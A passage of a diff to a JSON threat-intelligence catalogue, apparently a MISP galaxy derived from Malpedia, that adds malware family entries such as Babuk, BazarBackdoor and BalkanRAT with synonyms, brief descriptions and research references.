"https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8f648193-68ca-40c2-98b2-e5481487463e", + "value": "Avaddon Ransomware" + }, { "description": "", "meta": { @@ -4467,6 +8914,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" ], "synonyms": [], @@ -4480,10 +8928,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", - "https://blog.yoroi.company/research/the-ave_maria-malware/" + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest", + "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", + "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1", + "https://reaqta.com/2019/04/ave_maria-malware-part1/", + "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", + "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery", + "https://www.youtube.com/watch?v=T0tdj1WDioM", + "https://blog.yoroi.company/research/the-ave_maria-malware/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA" ], "synonyms": [ - "AVE_MARIA" + "AVE_MARIA", + "AveMariaRAT", + "Warzone RAT", + "avemaria" ], "type": [] }, @@ -4520,16 +8989,50 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/", + "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05", + "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", + "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://isc.sans.edu/diary/25120", + "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://fr3d.hk/blog/gazorp-thieving-from-thieves", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", - "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", - "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", - "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", + "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", + "https://twitter.com/DrStache_/status/1227662001247268864", + "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/", + "https://unit42.paloaltonetworks.com/cybersquatting/", + "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html", + "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", + "https://securelist.com/azorult-analysis-history/89922/", + "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", - "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/" + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east", + "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", + "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", + "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/", + "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [ "PuffStealer", @@ -4546,10 +9049,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", "http://www.spiegel.de/media/media-35683.pdf", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", + "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/" + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" ], "synonyms": [ "SNOWBALL" @@ -4559,6 +9062,28 @@ "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", "value": "Babar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/", + "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62", + "https://twitter.com/Sebdraven/status/1346377590525845504", + "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" + ], + "synonyms": [ + "Babyk Ransomware", + "Vasa Locker" + ], + "type": [] + }, + "uuid": "3e243686-a0a0-4aff-b149-786cc3f99a84", + "value": "Babuk Ransomware" + }, { "description": "", "meta": { @@ -4573,10 +9098,12 @@ "value": "BabyLon RAT" }, { - "description": "", + "description": "BABYMETAL is a command line network tunnel utility based on the TinyMet Meterpreter tool, primarily used to execute Meterpreter reverse shell payloads.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], @@ -4585,6 +9112,27 @@ "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", "value": "BABYMETAL" }, + { + "description": "BabyShark is Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://blog.alyac.co.kr/3352", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://twitter.com/i/web/status/1099147896950185985", + "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1", + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8abdd40c-d79a-4353-80e3-29f8a4229a37", + "value": "BabyShark" + }, { "description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.", "meta": { @@ -4615,12 +9163,30 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backoff", + "https://securelist.com/sinkholing-the-backoff-pos-trojan/66305/" ], "synonyms": [], "type": [] }, + "uuid": "70f68c8c-4dc5-4bb0-9f4d-a7484561574b", + "value": "Backoff POS" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", + "https://www.secureworks.com/research/threat-profiles/bronze-geneva", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [ + "Lecna", + "ZRLnk" + ], + "type": [] + }, "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", "value": "backspace" }, @@ -4633,7 +9199,9 @@ "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi", "https://www.cert.pl/en/news/single/backswap-malware-analysis/", "https://research.checkpoint.com/the-evolution-of-backswap/", + "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/" ], "synonyms": [], @@ -4642,6 +9210,20 @@ "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", "value": "BackSwap" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall", + "https://www.us-cert.gov/ncas/analysis-reports/ar19-252a", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9ddf546b-487f-44e4-b0dd-07e9997c86c6", + "value": "BADCALL (Windows)" + }, { "description": "", "meta": { @@ -4675,10 +9257,15 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", + "https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2" + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", + "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign", + "https://lab52.io/blog/new-patchwork-campaign-against-pakistan/" ], "synonyms": [], "type": [] @@ -4704,6 +9291,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" ], "synonyms": [], @@ -4716,17 +9304,59 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldir", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldr", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf", + "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/", "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/", "https://www.youtube.com/watch?v=E2V4kB_gtcQ" ], "synonyms": [ - "Baldr" + "Baldir" ], "type": [] }, "uuid": "7024893a-96fe-4de4-bb04-c1d4794a4c95", - "value": "Baldir" + "value": "Baldr" + }, + { + "description": "According to ESET, BalkanDoor is a simple backdoor with a small number of commands (download and execute a file, create a remote shell, take a screenshot). It can be used to automate tasks on the compromised computer or to automatically control several affected computers at once. We have seen six versions of the backdoor, with a range of supported commands, evolve since 2016.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door", + "https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "22d61347-4d89-41e7-89dc-95b1f370522d", + "value": "BalkanDoor" + }, + { + "description": "The goal of BalkanRAT which is a more complex part of the malicious Balkan-toolset (cf. BalkanDoor) is to deploy and leverage legitimate commercial software for remote administration. The malware has several additional components to help load, install and conceal the existence of the remote desktop software. A single long-term campaign involving BalkanRAT has been active at least from January 2016 and targeted accouting departments of organizations in Croatia, Serbia, Montenegro, and Bosnia and Herzegovina (considered that the contents of the emails, included links and decoy PDFs all were involving taxes). It was legitimaly signed and installed by an exploit of the WinRAR ACE vulnerability (CVE-2018-20250). ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_rat", + "https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d7b40333-a2ce-423d-9052-51b09bf18bb3", + "value": "BalkanRAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital", + "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/", + "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f355f41b-a6b2-48b7-9c5c-da99a41cb1ad", + "value": "Bamital" }, { "description": "", @@ -4741,6 +9371,38 @@ "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", "value": "Banatrix" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bancos", + "https://www.fireeye.com/blog/threat-research/2009/03/bancos-a-brazilian-crook.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a2ee2f24-ead8-4415-b777-7190478a620c", + "value": "bancos" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook", + "https://twitter.com/malwrhunterteam/status/796425285197561856", + "https://research.checkpoint.com/2020/bandook-signed-delivered/", + "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.eff.org/files/2018/01/29/operation-manul.pdf" + ], + "synonyms": [ + "Bandok" + ], + "type": [] + }, + "uuid": "3144e23d-6e3e-47e6-8f0e-a47be25d1041", + "value": "Bandook" + }, { "description": "", "meta": { @@ -4779,10 +9441,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", + "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", - "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" + "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://blog.reversinglabs.com/blog/hidden-cobra" + ], + "synonyms": [ + "COPPERHEDGE" ], - "synonyms": [], "type": [] }, "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", @@ -4792,7 +9461,23 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.barkiofork", + "https://www.symantec.com/connect/blogs/backdoorbarkiofork-targets-aerospace-and-defense-industry" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d2cdaceb-7810-4c80-9a69-0a6f27832725", + "value": "barkiofork" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] @@ -4817,7 +9502,8 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] @@ -4825,11 +9511,97 @@ "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", "value": "Batel" }, + { + "description": "BazarBackdoor is a small backdoor, probably by a TrickBot \"spin-off\" like anchor. Its called team9 backdoor (and the corresponding loader: team9 restart loader).\r\n\r\nFor now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", + "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration", + "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", + "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day", + "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", + "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/", + "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/", + "https://johannesbader.ch/blog/yet-another-bazarloader-dga/", + "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/", + "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader", + "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I", + "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II", + "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", + "https://twitter.com/anthomsec/status/1321865315513520128", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/", + "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", + "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/", + "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://www.scythe.io/library/threatthursday-ryuk", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/", + "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles", + "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/", + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor", + "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware", + "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/" + ], + "synonyms": [ + "BEERBOT", + "BazarCall", + "KEGTAP", + "Team9Backdoor", + "bazaloader" + ], + "type": [] + }, + "uuid": "3b1a6ba7-9617-4413-a4ad-66f5d9870bb7", + "value": "BazarBackdoor" + }, + { + "description": "A rewrite of Bazarloader in the Nim programming language.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod", + "https://twitter.com/James_inthe_box/status/1357009652857196546", + "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1735a331-9ca9-49b6-a5aa-0ddac9db8de6", + "value": "BazarNimrod" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", + "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae", + "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", + "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], "synonyms": [], @@ -4838,6 +9610,19 @@ "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", "value": "BBSRAT" }, + { + "description": "360 Security Center describes BBtok as a banking trojan targeting Mexico.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbtok", + "https://blog.360totalsecurity.com/en/360-file-less-attack-protection-intercepts-the-banker-trojan-bbtok-active-in-mexico/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0b114f49-8c4d-425d-8426-a0c4ab145f36", + "value": "BBtok" + }, { "description": "", "meta": { @@ -4863,6 +9648,19 @@ "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", "value": "Bedep" }, + { + "description": "Malware family observed in conjunction with PlugX infrastructure in 2013.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bee", + "https://www.virustotal.com/gui/file/38f9ce7243c7851d67b24eb53b16177147f38dfffe201c5bedefe260d22ac908/detection" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2d4aacb7-392a-46fd-b93d-33fcdaeb348f", + "value": "Bee" + }, { "description": "BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim's desktop.", "meta": { @@ -4876,6 +9674,19 @@ "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", "value": "beendoor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1732faab-2cf9-4d79-a085-6331da008047", + "value": "BeepService" + }, { "description": "Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.", "meta": { @@ -4915,6 +9726,19 @@ "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", "value": "BernhardPOS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bestkorea", + "https://github.com/Jacquais/BestKorea" + ], + "synonyms": [], + "type": [] + }, + "uuid": "33308a2c-b1ef-4cbb-9240-25cb6dce55a9", + "value": "BestKorea" + }, { "description": "", "meta": { @@ -4924,8 +9748,9 @@ "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", 